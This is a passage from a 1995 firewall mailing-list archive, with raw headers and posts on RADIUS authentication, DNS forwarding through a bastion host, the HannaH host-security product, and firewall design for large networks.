(smap@localhost) by NYC.Heuristicrat.COM (8.6.11/8.6.5) id OAA10103; Sat, 2 Sep 1995 14:48:04 -0400 Received: from gigi.nyc.heuristicrat.com(192.54.131.10) by NYC.Heuristicrat.COM via smap (V1.3) id sma010101; Sat Sep 2 14:48:03 1995 Received: by gigi.NYC.Heuristicrat.COM (4.1/SMI-4.1) id AA03042; Sat, 2 Sep 95 14:48:03 EDT Date: Sat, 2 Sep 95 14:48:03 EDT From: chuck@NYC.Heuristicrat.COM (Chuck Ocheret) Message-Id: <9509021848.AA03042@gigi.NYC.Heuristicrat.COM> To: rens@imsi.com, shields@tembel.org, stockwel@sctc.com Subject: Re: FW: Programming Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Xt is great for programming all sorts of things, only a small part of which are windowing apps. Definitely true, and even though I feel strongly about that (check out http://www.heuristicrat.com/papers/USENIX/AppDev.html) I wouldn't use Xt to write firewall code. ~chuck Chuck Ocheret ---------------------------------------------------------- Heuristicrats Research, Inc. +1 (914) 722-0245 [voice] 46 Andrea Lane, Suite 202 +1 (914) 722-0249 [fax] Scarsdale, NY 10583 chuck@NYC.Heuristicrat.COM From firewalls-owner Sat Sep 2 12:02:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA13973 for firewalls-outgoing; Sat, 2 Sep 1995 11:59:12 -0700 Received: from magneto.bosch.com (magneto.bosch.com [198.111.120.52]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA13966 for ; Sat, 2 Sep 1995 11:59:08 -0700 Received: by magneto.bosch.com; id OAA23750; Sat, 2 Sep 1995 14:54:22 -0400 Received: from cyber.rbus(198.168.2.2) by magneto via smap (V1.3) id sma023748; Sat Sep 2 14:54:02 1995 Received: by inet.rbus; id OAA27630; Sat, 2 Sep 1995 14:55:58 -0400 Received: from mail(172.16.1.21) by inet.rbus via smap (V1.3) id sma027628; Sat Sep 2 14:55:54 1995 Received: by mail.fh.rbus; id OAA03825; Sat, 2 Sep 1995 14:54:44 -0400 Date: Sat, 2 Sep 1995 14:54:44 -0400 Message-Id: <199509021854.OAA03825@mail.fh.rbus> X-Sender: cwerner@fh.rbus X-Mailer: Windows Eudora Version 2.1.1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: "Christopher L. Werner" Subject: Re: Use of Remote Authentication: tacacs/radius/etc... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 02:36 PM 9/1/95 -0300, Marcelo Lopes Rodrigues wrote: > >So why is Cisco starting to use Radius? (Packet magazine, Vol. 7, Number 2 >, Second Quarter 1995, pag. 13) > Well, large ISP's like Merit in Michigan are looking to RADIUS as the protocol of choice for dial-up authentication for a large network. Although you can get more information on the project from http://www.merit.edu, I can briefly say that they have over 150 member and affiliate organizations and will have every Elementary and Secondary school in the state as customers within a year. (timing logistics more than anything). We're talking millions of users, all which can dial into PPP based Network Access Servers (NAS -Livingston Portmasters) and authenticate using RADIUS to UNIX, VMS, NT, and Novell and have regulated, auditable, authentication using RADIUS encryption, UNIX password files, Kerberos, or TACACS. Merit is one of several big users who have been bugging Cisco to adapt the RADIUS protocol as an alternative to Livingston. Cisco's reaction to that market (Merit hopes to be so successful that many other large ISP's will use the same scheme and you can authenticate back to your local authorization server from any NAS nation/world-wide :-) ) and activity on the RADIUS standard committee may have something to do with it... -------------------------------------------------------------------- Opinions expressed are mine and not those of my employer. -------------------------------------------------------------------- Christopher L. Werner Robert Bosch Corporation System Engineer 38000 Hills Tech Dr. (810)553-1389 Farmington Hills, MI 48331-3417 From firewalls-owner Sat Sep 2 14:32:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15675 for firewalls-outgoing; Sat, 2 Sep 1995 13:42:39 -0700 Received: from intex.intex.net (intex.intex.net [204.255.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA15662 for ; Sat, 2 Sep 1995 13:42:36 -0700 Received: from dialupb56.intex.net (dialupb56.intex.net [204.255.103.56]) by intex.intex.net (8.6.12/8.6.12) with SMTP id PAA29162; Sat, 2 Sep 1995 15:40:50 -0500 Date: Sat, 2 Sep 1995 15:40:50 -0500 Message-Id: <199509022040.PAA29162@intex.intex.net> X-Sender: lpierce@intex.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: rse@en.muc.de, firewalls@GreatCircle.COM From: lpierce@intex.net (S. Lane Pierce) Subject: Re: DNS forwarding problem Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:50 AM 9/1/95 +0200, rse@en.muc.de wrote: >On 31 Aug 1995 01:16:55 +0200 in sdm.lists.firewalls you wrote: >> [...] >> You then configure all your clients INCLUDING THE BASTION/GATEWAY to resolve >> using the internal nameserver. >> [...] >> The really weird part is that when the bastion/gateway wants to resolve an >> internet name, it asks the internal, which forwards back to the bastion/gateway >> which does the resolution and sends the answer back along the same path. > >I cannot understand WHY the bastion has to resolve via the internal >nameserver. I run my bastion host via a /etc/resolv.conf which points to its >local nameserver. And this works fine. The bastion only needs to resolv the >name of the internal bastion and this name is in his DNS. > >Are there any _REAL_ security concerns about resolving the outer bastion host >NOT via the internal bastion host? [.sig snipped] There is not so much a security concern here. The question is, "Does the bastion require knowledge of internal hosts that are not listed in its files?". If not then the bastion should be configured to ask itsself. This prevents a successfull cracker from obtaining additional information about the inside hosts. If so then he must be configured to ask the inside server else the info could not be obtained. Is this clear as mud? Good luck. ---------------------------- S. Lane Pierce lpierce@intex.net From firewalls-owner Sat Sep 2 15:01:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA18400 for firewalls-outgoing; Sat, 2 Sep 1995 14:51:12 -0700 Received: from scruz.net (nic.scruz.net [165.227.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA18386 for ; Sat, 2 Sep 1995 14:51:06 -0700 Received: from histar2.ezunx.com by scruz.net (8.6.9/1.34) id OAA27846; Sat, 2 Sep 1995 14:49:43 -0700 Date: Sat, 2 Sep 95 14:41:50 PDT From: Rich Subject: Large-Mixed-OS FW access problem To: firewalls@greatcircle.com X-Mailer: Chameleon V0.05, TCP/IP for Windows, NetManage Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, Got a perhaps unusual problem that perhaps I can get a few suggestions or help with. I have a network with a very large mix of OS's, and with over 6000 users who require Internet access. The problem is this - Over 60% of the users will have to use DYNAMIC IP addresses, since there are not enough to go around, AND they are running OS/2, WFW, Apple, and a few other mixtures of OS/nos stacks. The remaining 40% will be using static IP addresses and mostly will be running WFW, but also some other mixed OS/nos base. We have a single Internet connection. Oh, and we want to authorize access with username, not ip addresses (for obvious reasons, the dhcp/bootp people). Normally, access to the net should be pretty straight forward, but maybe I am just not thinking straight today. I can't figure out a good way to set up authorization host(s) to handle all the necessary accesses. Yes, I know I am going to have some throughput issues with such large numbers, but that is one of the reasons we want a single access point, for the security and management issues. Comments, suggestions? Firewall recommendations? proxy/bastion suggestions? ADVANCE Rich Fitzgerald (408) 456-0430 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ** Remember -- Life is NOT a dress rehearsal! (nor is it a small furry animal with funny feet and floppy ears...) From firewalls-owner Sat Sep 2 15:35:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA19841 for firewalls-outgoing; Sat, 2 Sep 1995 15:23:07 -0700 Received: from bastion.sware.com (bastion.sware.com [139.131.15.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA24768 for ; Fri, 1 Sep 1995 16:01:58 -0700 Received: from shlep.sware.com (shlep.sware.com [139.131.1.14]) by bastion.sware.com (8.6.12/8.6.5) with SMTP id SAA26334 for ; Fri, 1 Sep 1995 18:50:51 -0401 Received: by shlep.sware.com (5.65/2.0) from neptune.sware.com id AA14364; Fri, 1 Sep 95 18:50:15 -0400 Received: by neptune.sware.com (5.65/2.1) from localhost id AA05261; Fri, 1 Sep 95 18:51:03 -0400 Message-Id: <9509012251.AA05261@neptune.sware.com> From: "Mark W. Reardon" X-Mailer: SecureMail [2.1.2] Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Subject: Re: HannaH from SecureWare Inc. To: firewalls-digest@GreatCircle.COM Date: Fri, 01 Sep 95 18:51:02 EDT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -----BEGIN PRIVACY-ENHANCED MESSAGE----- Proc-Type: 4,MIC-CLEAR Content-Domain: RFC822 Originator-Certificate: MIIBxjCCAXACFFjVVBsGH5SnHa42KUiEyt0AAAAAMA0GCSqGSIb3DQEBAgUAMFkx CzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9TZWN1cmVXYXJlIEluYy4xFzAVBgNVBAsT DlNlY3VyZVdhcmUgUENBMRcwFQYDVQQLEw5FbmdpbmVlcmluZyBDQTAeFw05NTA1 MTExMzUzNDVaFw05ODA1MTAxMzUzNDVaMHMxCzAJBgNVBAYTAlVTMRgwFgYDVQQK Ew9TZWN1cmVXYXJlIEluYy4xFzAVBgNVBAsTDlNlY3VyZVdhcmUgUENBMRcwFQYD VQQLEw5FbmdpbmVlcmluZyBDQTEYMBYGA1UEAxMPTWFyayBXLiBSZWFyZG9uMFkw CgYEVQgBAQICAgQDSwAwSAJBDdoErtN8vyza47fIQHiy1DCvMBhr9Wc3ByPJ/9Ek rKojJnyXDYzQh0JX3oOLZ0ITBCnbBM69w0DTs4aSJTQjqEcCAwEAATANBgkqhkiG 9w0BAQIFAANBAJcyeNNIi4blzo1SjWV2sXfRQ9uhNHZ4t89hZLbCjaRYvoXjW1Uv XYCLO/YG1flFrXp5xOzd04+2OcLsw9RViDk= Issuer-Certificate: MIIBkzCCAT0CFEbO5h6/SKxULWrq4aExKoYAAAAAMA0GCSqGSIb3DQEBAgUAMEAx CzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9TZWN1cmVXYXJlIEluYy4xFzAVBgNVBAsT DlNlY3VyZVdhcmUgUENBMB4XDTk1MDUwODIwMjAxNloXDTk3MDUwNzIwMjAxNlow WTELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1NlY3VyZVdhcmUgSW5jLjEXMBUGA1UE CxMOU2VjdXJlV2FyZSBQQ0ExFzAVBgNVBAsTDkVuZ2luZWVyaW5nIENBMFkwCgYE VQgBAQICAgADSwAwSAJBAL4Od/KxhOB6HyUbBJC2X6Ic2P0XEcGnddzJ1QEHjSFy x5qzn098ScMWDEJSiwrsVmQFbNvN01hkke7ZE21aG5sCAwEAATANBgkqhkiG9w0B AQIFAANBALtOOv3SWxy+/VEvvY6j06wUNQRhqbtX5g8HgOwPgvoqcrRl939lcOcx X7q8YB5bVVTow4PsFfnorV5gsOBwnf4= MIC-Info: RSA-MD5,RSA, ANBJA9k1rs8MWI2SJ1E6qO+XYsSNWbjNBK3wcslMwtCMHobUrf3zLuFxzWarDgaY s/A6GBr9UekszKI+UtFTX0c= SecureWare really doesn't see Hannah as a replacement for firewalls. As some of the respondents have pointed out, a node-based solution may be more difficult to administer and scale to a large number of platforms. We've tried to make HannaH scalable by including centralized administration for distributed environments. A node based solution is a problem if it is not available on ALL of the platforms that you want to protect. We will address this problem over time as we offer HannaH on additional platforms or other vendors offer compatible products since HannaH protocols are published for anyone to implement. A firewall is a very valid perimeter solution that is a great choke point between the "inside" and the "outside". However, there are many environments that firewalls alone simply cannot address. Some of the environments would benefit from a combined HannaH/firewall solution, which we are currently pursuing. Some could be addressed by firewalls alone, and others are simply inappropriate for HannaH. We have tried to describe some of the target markets for HannaH in a white paper that you can grab off our web page. If you have further questions about HannaH in a specific environment, you can contact SecureWare directly. Let me re-iterate, however, that HannaH is not the network security panacea. It fills an important gap and advances the state of the art in security products and (we hope) will be applicable to a wide range of environments for which there is simply no solution today. That said, I would like to give a few brief responses to some of the comments made in the most recent postings to the list. On Thu, 31 Aug 1995, Gary Flynn wrote: > [...] > Problems with firewall throughput go away. Again, it depends on the environment. You can provide access to some applications on the "inside" directly without having to go through a firewall. You can combine HannaH with a firewall to provide protected access to the firewall and then go through your traditional proxy to get inside. If you are, for example, a large retail chain and want to have your stores post their inventory figures to a central machine over the Internet, HannaH would work just fine and you wouldn't need a firewall for that application. Just one example, . . . >[...] > I'd think the only problem would be possible incompatibilty bugs > with the standard API but if the API stays generally stable, those > bugs would eventually get worked out. > HannaH doesn't modify the API used for communications, it instead installs below it so that no application modifications are required. This was one of the original requirements for HannaH since we did not want to get in the business of telling other software vendors that they need to rewrite the applications to make them use HannaH. On Thu, 31 Aug 1995, David Miller wrote: > First, there's the possibility that people will not use the product, or > that their product will not fit all type, styles, and rev levels of > computer on your network. Once one of the systems on your network is > compromised it becomes a safe staging area for attacks on the rest of > your network. Which leads us to ... These are very valid points. Initially, HannaH is not being offered on all computing platforms. It cannot secure those platforms that it isn't running on. While it does allow connections from non-HannaH host, they are not secure. We recommend that HannaH systems are configured to enforce the level of security required for the environment that it is in. For example, the types of connections allowed to a non-HannaH host might be restricted to a specific set of hosts and applications. A non-HannaH host can only give you spoofable IP addresses and port numbers, and that's all HannaH can go on. > Second, the whole reason people put the soft chewy center in the middle > of a very hard shell is so there is a single access point to be > administered. It's one thing to get a good security person to > manage/monitor the firewall through which all traffic flows. It's > another thing altogether (usually thought impossible in any sizeable > installation) to try and have many administrators adequately secure their > systems. This is a good analogy and it helps to point out that there are different needs that are addressed by HannaH and Firewalls. Firewalls are perimeter protection, and one of the problems they have is authenticating the remote party. If a Firewall has HannaH running, HannaH can provide that strength. This replaces identification of remote users by IP address, with something a lot harder to forge, the remote user's cryptographically authenticated identity. Also, Firewalls do nothing against the internal attacks. That is a problem that can be addressed by securing sensitive information on HannaH systems by only allowing connections through secure, encrypted pipes. Then, even the communications between two computers in the payroll department are secured from the network trouble shooter's sniffer. Lastly, though a node level solution, HannaH is designed with a centralized management concept. Once installed, all systems level security is configured and monitored from a central management work station. Ease of management has been a primary concern from the out set of HannaH. This includes both Access Control and Audit Information. We don't think of HannaH as a replacement for Firewalls, it is instead a complimentary tool. In addition, some businesses may have decided that a Firewall is too expensive for some application, i.e., the mobile user calling the office, the one or two computer remote office. HannaH, since it is a software solution, addresses these needs in a different way that may be more affordable. Finally, Alan Hannan wrote in response to Gary Flynn and David Miller: >>[...] > Sure, let's just open up the bloody borders of our country to anyone, we > wouldn't want to impede any travel, would we? Heavan forbid Iraqis should > actually have to stop at the border to our country, we should allow > them and all others to come in unimpeded. Geez. > >>[...] > Quite obviously, one that thinks individual host security should have > more emphasis than network security has never tried to implement such a > policy. More clearly, one who thinks indiv. hosts are more important > than network security has no concept of time=money. We are not advocating individual host security over network security or the other way around. Both have their strengths and weaknesses. In the security for Security First Network Bank, the first Internet bank, SecureWare used filtering routers, Firewalls, Hannah, and other techniques such as secure operating systems. Clearly, strong security means analyzing the entire network and each computer on it for weakness. Then each of those weaknesses has to be addressed. HannaH and Firewalls are complimentary tools to be used in such an exercise. There have also been posted a few comments made regarding UDP and Kerberos. I am not a Kerberos expert and so I went to some of the other people within SecureWare that have studied it. They provided these short comments: - ---------- Beginning of Message ----------- Kerberos: Hannah is similar to Kerberos in many ways. Probably the major differences include: - Hannah uses public key cryptography for authentication and key management whereas Kerberos uses symmetric key management techniques that require an on-line "ticket-granting-service". The use of public key cryptography: - makes Hannah more robust, - eliminates security problems associated with mutually suspicious users having to trust a common entity, - allows Hannah to scale better, particularly simplifying controlled interoperability between disparate organizations. - Hannah is installed in a system below the API (it transparently replaces the Winsock layer for Windows XX, and resides within the protocol stack for Unix). Unlike Kerberos which requires that you modify an application to obtain security, Hannah is completely transparent to applications. Web browsers, X, SMTP, ftp, telnet, rcp, rsh, etc... are all secured without modification. ALSO, because Hannah is below the API, the security administrator has the option of MANDATING security, such that it cannot be bypassed by any user or application. This cannot be done using Kerberos. UDP: Hannah will support UDP in an early point release. Key management will not impose much of a burden upon UDP applications, for the key management process retains a security state for recent datagram sessions. Of course, if a session consists of a single datagram there will be a substantial hit, but that is the price paid for strong authentication. Multicast: With the addition of UDP support, Hannah will support multicast using manual key management. Multiuser Hannah and certificate diskettes: Key material for users need not reside on a protected floppy. On those systems with adequate access control, it can reside in a local file. Hannah also supports the use of smart cards, including the National Security Agency's Fortezza Card. There are plans for Hannah to supports multiuser operation on Unix systems using either file-based or smart card key repositories. Logging out: On all systems, key material is protected within a special Cryptographic Subsystem and is not accessible to an application. It is deactivated (or destroyed) when the user logs out. Perhaps a point release should include a screen saver option that automatically deactivates the key material after an appropriate interval of inactivity. Of course, the ultimate level of protection provided the key material depends upon the overall security of the underlying platform. That is why Hannah is offered on platforms including military grade B-level operating systems. - ---------- End of Message ----------- I hope these are informative. Mark - ------------------------------------------------------------------------------- Mark Reardon | SecureWare, Inc. | WWW is http://www.secureware.com (404)315-6296 | 2957 Clairmont Rd., Ste. 200 | email is mwr@sware.com ext. 134 | Atlanta, GA 30329-1647 | This letter was created using SecureMail. If you do not have a PEM reader, please ignore the privacy headers. -----END PRIVACY-ENHANCED MESSAGE----- From firewalls-owner Sat Sep 2 16:00:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20275 for firewalls-outgoing; Sat, 2 Sep 1995 15:39:45 -0700 Received: from zeus.ci.ua.pt (zeus.ci.ua.pt [193.136.80.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA20260 for ; Sat, 2 Sep 1995 15:39:40 -0700 Received: by zeus.ci.ua.pt (1.37.109.16/16.2) id AA173114955; Sun, 3 Sep 1995 00:35:55 +0100 From: Fernando Cozinheiro Message-Id: <199509022335.AA173114955@zeus.ci.ua.pt> Subject: RADIUS... Where is it? To: firewalls@greatcircle.com Date: Sun, 3 Sep 1995 00:35:55 +0100 (PST) Cc: cooker@zeus.ci.ua.pt (Fernando Cozinheiro) Reply-To: Fernando.Cozinheiro@ua.pt Organization: Universidade de Aveiro, Portugal X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 635 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dear friends: I'm seeing several references about Radius on this list... Could anyone from where can I get any document describing it and the package itself? Thanks in advance. -- Fernando Cozinheiro http://sweet.ua.pt/~cooker/ System & Network Administrator Email: cooker@ci.ua.pt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Universidade de Aveiro Phone: Centro de Informatica UA: +351 34 370200/Ext.2254 3810 Aveiro CIUA: +351 34 370345 Portugal Telefax: +351 34 370214 From firewalls-owner Sat Sep 2 17:00:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA21419 for firewalls-outgoing; Sat, 2 Sep 1995 16:34:33 -0700 Received: from gatekeep.genmagic.com (gatekeep.genmagic.com [192.216.16.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA21412 for ; Sat, 2 Sep 1995 16:34:30 -0700 Received: from (genmagic.genmagic.com [10.1.4.12]) by gatekeep.genmagic.com (8.6.9/8.6.9) with SMTP id OAA22595; Sat, 2 Sep 1995 14:16:51 -0700 Received: from abulafia.genmagic.com by genmagic.genmagic.com (4.1/SMI-4.1/JBS) id AA06266; Sat, 2 Sep 95 16:29:20 PDT Received: by abulafia.genmagic.com (931110.SGI/930416.SGI) for @genmagic.genmagic.com:firewalls@GreatCircle.COM id AA04163; Sat, 2 Sep 95 16:30:08 -0700 Date: Sat, 2 Sep 95 16:30:08 -0700 From: jet@abulafia.genmagic.com (J. Eric Townsend) Message-Id: <9509022330.AA04163@abulafia.genmagic.com> To: Rich Cc: firewalls@GreatCircle.COM Subject: Large-Mixed-OS FW access problem In-Reply-To: References: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk my nickel's worth, now that I've bailed from our MIS department due to political differences with new management. :-) if you haven't already, go to non-internic-assigned addresses. Take 10.*.*.*, we're using it. :-) "raf" == Rich writes: raf> Over 60% of the users will have to use DYNAMIC IP addresses, raf> since there are not enough to go around, AND they are running raf> OS/2, WFW, Apple, and a few other mixtures of OS/nos stacks. Put the DYNAMIC addresses in their own subnet range. We did this by having 10-bit subnets and putting dynamics in their own chunk of that. Then do massive sets of automated reverse entries for *everything* in that range. (Yes it's annoying, but then you can just chunk things into that range and not worry about it.) raf> We have a single Internet connection. Oh, and we want to raf> authorize access with username, not ip addresses (for obvious hm. Dunno on that one. raf> I know I am going to have some throughput issues with such large raf> numbers, but that is one of the reasons we want a single access raf> point, for the security and management issues. proxy/cache the WWW stuff and that'll help more than one would expect. (URL's get passed around the office and suddenly half the company wants to see what's so funny about www.micros0ft.com.) dual-router with bastion/proxy hosts for various services. It's easier to handle having machines on the internet and proxy stuff this way. (ex: Our external www server is in the DMZ and is considered a 'hostile' system by the routers. This means we can spend less time/effort securing the server and more time securing the mail gateway.) be prepared to spend a large amount of money. If the tightwads in accounting refuse, only provide the services you can afford to provide securely. This usually helps them budge, as the users complain to you, you explain "it's all the money I'm allowed to spend". (That, or departments that can business justify intenret access will offer funds from their budgets.) Failing that, ask accounting how much it will cost if someone from a competitor starts reading the CEO's mail. Then show them how it's done. :-) From firewalls-owner Sat Sep 2 22:00:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA24408 for firewalls-outgoing; Sat, 2 Sep 1995 21:43:13 -0700 Received: from ncelec.com ([199.238.59.23]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA24401 for ; Sat, 2 Sep 1995 21:43:10 -0700 Received: by ncelec.com (5.4R3.10/200.2.1.5) id AA05496; Sat, 2 Sep 1995 21:39:22 -0700 From: "Mike Culver-Support" Message-Id: <9509022139.ZM5494@ncelec.com> Date: Sat, 2 Sep 1995 21:39:21 -0700 X-Mailer: Z-Mail Lite (3.2.0 26may94) To: firewalls@greatcircle.com Subject: Frame-Relay Net Connections Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We all know (and some of us even agree) that a bastion host on a DMZ is the best way to protect yourself from the net. Anyone have a suggestion for sites that connect to their service provider via a Frame Relay connection? In this case, there is a virtual circuit to the service provider, but the circuit runs thru a common interface on a router that also serves WAN sites that are oart of the internal network. This is a fairly common connection method! From firewalls-owner Sat Sep 2 23:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA26177 for firewalls-outgoing; Sat, 2 Sep 1995 23:17:41 -0700 Received: from dogbert.ipa.net (dogbert.ipa.net [205.218.170.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA26170 for ; Sat, 2 Sep 1995 23:17:37 -0700 Received: (from darren@localhost) by dogbert.ipa.net (8.6.12/8.6.9) id BAA09831; Sun, 3 Sep 1995 01:25:09 -0500 From: "Darren K. Bolding" Message-Id: <199509030625.BAA09831@dogbert.ipa.net> Subject: Re: RADIUS... Where is it? To: Fernando.Cozinheiro@ua.pt Date: Sun, 3 Sep 1995 01:25:08 -0500 (CDT) Cc: firewalls@GreatCircle.COM, cooker@zeus.ci.ua.pt In-Reply-To: <199509022335.AA173114955@zeus.ci.ua.pt> from "Fernando Cozinheiro" at Sep 3, 95 00:35:55 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1311 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In the previous message, Fernando Cozinheiro said: > > Dear friends: > > I'm seeing several references about Radius on this list... > > Could anyone from where can I get any document describing it and the > package itself? > > Thanks in advance. > > -- > Fernando Cozinheiro http://sweet.ua.pt/~cooker/ > System & Network Administrator Email: cooker@ci.ua.pt > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > Universidade de Aveiro Phone: > Centro de Informatica UA: +351 34 370200/Ext.2254 > 3810 Aveiro CIUA: +351 34 370345 > Portugal Telefax: +351 34 370214 > You can find out about the Livingston implementation of Radius at http://www.livingston.com/products/dts_radius.htm Merit's web archive is at: http://home.merit.edu/webstuff/radius/ There is a fair bit of Radius tweaking going on, the Livingston Portmaster mailing list is an innapropriate place to discuss it (IMHO), but seems a popular one nonetheless. -- -- Darren Bolding Senior network engineer darren@bolding.org -- -- Internet Partners of America 1-800-785-4091 X106 darren@ipa.net -- -- ISP design and implementation. WAN, UNIX and Security consulting -- From firewalls-owner Sun Sep 3 01:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA27135 for firewalls-outgoing; Sun, 3 Sep 1995 00:48:32 -0700 Received: from ford.gbnet.org (ford.gbnet.org [192.188.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA27128 for ; Sun, 3 Sep 1995 00:48:27 -0700 Received: (from steve@localhost) by ford.gbnet.org (8.7.Beta.10/8.6.12) id IAA13998; Sun, 3 Sep 1995 08:46:51 +0100 (BST) From: Steve Kennedy Message-Id: <199509030746.IAA13998@ford.gbnet.org> Subject: Re: Use of Remote Authentication: tacacs/radius/etc... To: cwerner@fh.us.bosch.com (Christopher L. Werner) Date: Sun, 3 Sep 1995 08:46:50 +0100 (BST) Cc: firewalls@GreatCircle.COM In-Reply-To: <199509021854.OAA03825@mail.fh.rbus> from "Christopher L. Werner" at Sep 2, 95 02:54:44 pm X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Christopher L. Werner > At 02:36 PM 9/1/95 -0300, Marcelo Lopes Rodrigues wrote: > >So why is Cisco starting to use Radius? (Packet magazine, Vol. 7, Number 2 > >, Second Quarter 1995, pag. 13) > Well, large ISP's like Merit in Michigan are looking to RADIUS as the protocol > of choice for dial-up authentication for a large network. Although you can Beware of the RADIUS implementations from Livingston and Merit. There is a serious bug in the socket handling code (I think) that causes the server to get confused under heavy load. Demon Internet found this when they installed their version of the RADIUS server, they have fixed it (being an ISP with a large dial-up community does tend to stress test these things though). Regards Steve -- home steve@gbnet.org * Flat 2, 43 Howitt Road, Belsize Pk, London NW3 4LU work steve@demon.net * tel +44-(0)171 483 1169 FAX +44-(0)181 444 6103 www http://www.gbnet.net/ * GSM mobile +44-(0)802 444 500 bits steve@gbnet.net * GSM data @2400 0802-449500 @9600 449501 fax 449502 Euro firewall info - send mail to majordomo@gbnet.net (subscribe firewalls-uk) From firewalls-owner Sun Sep 3 13:00:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA06946 for firewalls-outgoing; Sun, 3 Sep 1995 12:38:49 -0700 Received: from mailer.gu.se (mailer.gu.se [130.241.150.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA06939 for ; Sun, 3 Sep 1995 12:38:45 -0700 Received: from mail2gsv.gu.se (mail2gsv.gu.se [193.10.79.11]) by mailer.gu.se (8.6.10/8.6.10) with ESMTP id VAA20687 for ; Sun, 3 Sep 1995 21:37:23 +0200 Received: from gsv.gu.se (mail2gu.gsv.se [146.21.73.101]) by mail2gsv.gu.se (8.6.11/8.6.9) with ESMTP id VAA11428 for ; Sun, 3 Sep 1995 21:17:48 +0200 Received: from pc_emi_18 (pc_emi_18 [146.21.73.218]) by gsv.gu.se (8.6.11/8.6.11) with SMTP id VAA29975 for ; Sun, 3 Sep 1995 21:37:23 +0200 Message-Id: <199509031937.VAA29975@gsv.gu.se> X-Sender: harald@146.21.73.101 X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Date: Sun, 03 Sep 1995 21:20:25 +0100 To: firewalls@greatcircle.com From: harald@emi.gu.se (Harald Astrand) Subject: DNS forwarding problem Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I have problems getting the DNS to work using internal roots on our network. The internal root servers are set up with a named.boot file: primary . db.root forwarders x.x.x.x The x.x.x.x host is the firewall machine on a separate C-net. On the firewall I have a regular (non-root) name-server. When I try to reach out-side host with nslookup from the internal root I get the following error-message: can't find x.y.z: Non-existant domain. I guess this is because the internal root thinks itself as authoritive of everything and sees no need for forwarding the request to the firewall. Is there a way to get this working and still using internal root? (We use HP-UX and have SOCKS running on the firewall). Any help would be very appreciated. Regards Harald -------------------------------------------------------------------- Harald Åstrand Email: EMI, Sahlgrenska Hospital Tel. +46 (0)31 - 60 26 82 Röda Stråket 4 Fax. +46 (0)31 - 60 23 83 S-413 45 Göteborg Memo: GVS.KOMMUN.VSCHAD Sweden From firewalls-owner Sun Sep 3 13:30:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA07192 for firewalls-outgoing; Sun, 3 Sep 1995 13:05:17 -0700 Received: from ki1.chemie.fu-berlin.de (ki1.Chemie.FU-Berlin.DE [160.45.24.21]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA07185 for ; Sun, 3 Sep 1995 13:05:11 -0700 Received: by ki1.chemie.fu-berlin.de (Smail3.1.28.1) from odb.rhein-main.de (193.141.47.4) with smtp id ; Sun, 3 Sep 95 22:03 MEST Received: from [193.141.47.129] by odb.rhein-main.de with smtp (Smail3.1.28.1 #5) id m0spLGP-0007SWC; 